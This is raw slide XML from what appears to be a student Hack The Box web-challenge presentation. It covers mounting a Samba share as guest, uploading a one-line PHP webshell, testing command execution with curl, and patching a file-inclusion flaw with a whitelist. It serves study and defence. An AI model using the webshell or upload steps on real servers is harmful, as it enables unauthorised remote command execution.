          <a:off x="0" y="64290"/>
          <a:ext cx="6628804" cy="7605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Mounted Samba share locally:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="37125" y="101415"/>
        <a:ext cx="6554554" cy="686250"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCB0BDDA-3E3A-426E-BB42-F489D2BB9A3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="882390"/>
          <a:ext cx="6628804" cy="760500"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-592857"/>
                <a:satOff val="2840"/>
                <a:lumOff val="2627"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-592857"/>
                <a:satOff val="2840"/>
                <a:lumOff val="262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sudo mount -t cifs //172.17.0.2/app /mnt/ -o username=guest,port=445</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="37125" y="919515"/>
        <a:ext cx="6554554" cy="686250"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2FA7907E-3152-4EFF-9FB5-9D0C15AFF392}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1700490"/>
          <a:ext cx="6628804" cy="760500"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1185714"/>
                <a:satOff val="5680"/>
                <a:lumOff val="5255"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1185714"/>
                <a:satOff val="5680"/>
                <a:lumOff val="5255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Uploaded shell.php for command execution:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="37125" y="1737615"/>
        <a:ext cx="6554554" cy="686250"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3F9D28C0-D5FC-4BA0-8147-0508D3F93E01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2518590"/>
          <a:ext cx="6628804" cy="760500"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1778572"/>
                <a:satOff val="8520"/>
                <a:lumOff val="7882"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-1778572"/>
                <a:satOff val="8520"/>
                <a:lumOff val="7882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&lt;?php system($_GET['cmd']); ?&gt;</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="37125" y="2555715"/>
        <a:ext cx="6554554" cy="686250"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1428289C-C192-4ACB-AC7A-E9EBC896B303}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3336690"/>
          <a:ext cx="6628804" cy="760500"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:hueOff val="-2371429"/>
                <a:satOff val="11360"/>
                <a:lumOff val="10510"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-2371429"/>
                <a:satOff val="11360"/>
                <a:lumOff val="1051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Command execution tested successfully through webshell:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="37125" y="3373815"/>
        <a:ext cx="6554554" cy="686250"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2C2C4A3B-0C2E-48D1-A08D-A1A672B25D71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4154790"/>
          <a:ext cx="6628804" cy="760500"/>
        </a:xfrm>
        <a:prstGeom prst="roundRec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96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent2">
                <a:hueOff val="-2964286"/>
                <a:satOff val="14200"/>
                <a:lumOff val="1313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curl "http://127.0.0.1/shell.php?cmd=id"</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="37125" y="4191915"/>
        <a:ext cx="6554554" cy="686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109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9269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743653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2175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6859348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296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3935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8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80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86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109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94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73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08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659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190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25243-00C8-060F-D1B3-542370B52B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578133"/>
            <a:ext cx="4335468" cy="287553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0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian"/>
              </a:rPr>
              <a:t>Secure Server</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3800" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3800">
                <a:latin typeface="Algerian"/>
              </a:rPr>
              <a:t>Hack the Box</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3800" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="3800" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian"/>
              </a:rPr>
              <a:t>Category: Web</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3800" b="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3800"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3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0304C-3A2C-438D-F82A-0352A35395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453667"/>
            <a:ext cx="4335468" cy="1096899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500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By: Vishal Suman, Youssef Elmorsi and Jean-Charles </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="0" i="0" u="none" strike="noStrike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Hekamanu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" b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buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1500"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1500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B2A67C6D-D057-A39E-0792-5055A33729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6095998" y="2644298"/>
            <a:ext cx="3280613" cy="184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079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16CD19-1208-10DF-1631-3987F6029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pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4100" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Webshell Deployment via Samba</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4100" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4100">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4100">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="8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FC667E6C-D2E0-B7E1-8589-7E0882A2FB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6392066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3472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F1515-5FFA-5404-957C-CD846697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562" y="609600"/>
            <a:ext cx="6424440" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>PHP Code Patching (LFI Mitigation)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2500" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Top view of cubes connected with black lines">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D11F4CE2-A4AE-EFEE-82A4-0E91662FE5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819" t="142" r="26366" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="2734036" cy="6876278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</p:spPr>
      </p:pic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64BDDC35-A3BC-93A7-49E6-1ED06A4B8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562" y="2160589"/>
            <a:ext cx="6424440" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Identified the vulnerability in our-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>projects.php</a:t>
            </a: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, where the project parameter was directly used in the include() function:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman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include "../projects/" . $project;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman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000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Applied whitelisting validation:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b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if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>in_array</a:t>
            </a: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($project, $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>allProjects</a:t>
            </a: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)) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman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include "../projects/" . $project;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman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} else {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman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echo "Invalid project selection.";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pP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Validated locally that only allowed project files (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>orion</a:t>
            </a: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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>, ceres) could be included.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1000"/>
            </a:b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243026451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E6A5D-684C-E78D-D7E4-D96E8FAD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867" y="609600"/>
            <a:ext cx="7462135" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t> Checker Validation on HTB</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4000" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4000">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="Storage crates">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BFE0AC8-272A-AD8C-B192-51DD013D6A4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36045" r="37515" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="2734036" cy="6876278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842596" y="6858000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1191846"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
        </p:spPr>
      </p:pic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518E5A25-92C5-4F27-8E26-0AAAB0CDC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19184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4B192-C2B8-20FA-3CB5-B7D2BA6DA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47" y="2160589"/>
            <a:ext cx="7077620" cy="3880773"/>
          </a:xfrm>
        </p:spPr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Attempted to connect to the HTB checker service on port 1337:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b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 b="0" i="0" u="none" strike="noStrike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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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en-US" sz="2000" b="0" i="0" u="none" strike="noStrike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Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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-p 1337 94.237.54.4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b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Result: Port 1337 remains closed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b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Multiple restarts of the HTB instance were performed, but checker service did not initialize.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b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40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2EC6F-704B-C9FC-DE1A-0C165243C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609600"/>
            <a:ext cx="5215467" cy="5175624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrik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lgerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Current Status</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4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lgerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4000">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="1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62D1A-C67D-C9AE-8A23-92C6AC022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084" y="609601"/>
            <a:ext cx="6075916" cy="5175624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"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LFI vulnerability identified and successfully patched.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b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000" b="0" i="0" u="none" strike="noStrike" err="1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Webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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deployed and verified for remote command execution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b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0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Unable to validate the fix via HTB’s checker (port 1337 closed)—real flag capture pending.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b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br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:b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8692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A78D-36C9-953B-DC42-202EB3A13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843375" cy="5175624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="0" i="0" u="none" strike="noStrik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lgerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Conclusion</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b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</a:br>
            <a:b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5DA51-0B06-143E-797D-171BE450E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4021" y="0"/>
            <a:ext cx="6254779" cy="6857999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/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core exploitation workflow — including service enumeration, LFI vulnerability identification, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" err="1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webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="24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deployment, and PHP code patching — was successfully completed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b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HTB checker validation is currently pending due to service unavailability on port 1337. However, the vulnerability was effectively mitigated through input whitelisting, allowing only approved project files.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b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challenge demonstrated the real-world risks associated with improper file inclusion handling and exposed how a simple misconfiguration could lead to remote code execution. Key skills gained include advanced enumeration techniques, exploiting Local File Inclusion vulnerabilities, bypassing log protections, and applying secure coding principles in PHP.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b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a production environment, additional security measures such as stricter input validation, secure Samba configurations, and service hardening would be critical to prevent such attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b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b="0" i="0" u="none" strike="noStrike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Next, upon checker activation, validation and flag capture will be completed. If service unavailability persists, escalation to HTB support is planned.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b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buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="11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393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79AC0-8690-B4B4-1128-D2E0211A0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562" y="609600"/>
            <a:ext cx="6424440" cy="1320800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Objective</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="0">
                <a:effectLst/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2800"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26" descr="Ethernet cables connected to a networking patch">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13DDD318-313C-E564-1DB4-1B981041E0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813" t="140" r="29432" b="-2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="2734036" cy="6876278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</p:spPr>
      </p:pic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2E8DD-67A4-12FD-F8E4-050F8FB24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562" y="2160589"/>
            <a:ext cx="6424440" cy="388077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n-US">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>The objective of this challenge is to understand </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>which vulnerabilities existed that allowed us to break into the secure server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Documenting which tools were utilized to help exploit the existing vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>The agenda was to gather information (recon), vulnerability identification, exploitation and finally privilege escalation</a:t>
            </a:r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23754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032C2-FF74-2DB0-0F2C-8BA3AC195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 rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Tools and Techniques Used</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
            </a:endParaRP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E123D76-7B09-85E3-6462-5AD6DEF10A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7299731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22776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66397-2516-4039-8E40-5850BCC57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 rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2300" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability identification</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="2300">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2300">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
            </a:endParaRPr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248F742-AEFB-F8B8-305C-4CDCA551A2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6759107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30570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6AA30-6A09-3965-7220-AE2803ED1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Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>CVE Record 2024-6387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44BBE1-CEEA-D4C4-AB34-7F3A1979B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51" y="2919038"/>
            <a:ext cx="3856774" cy="1108822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9145CF0-37C2-E348-3599-B030B20BA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b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Description</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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  <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>A security regression (CVE-2006-5051) was discovered in OpenSSH's server (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>). There is a race condition which can lead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
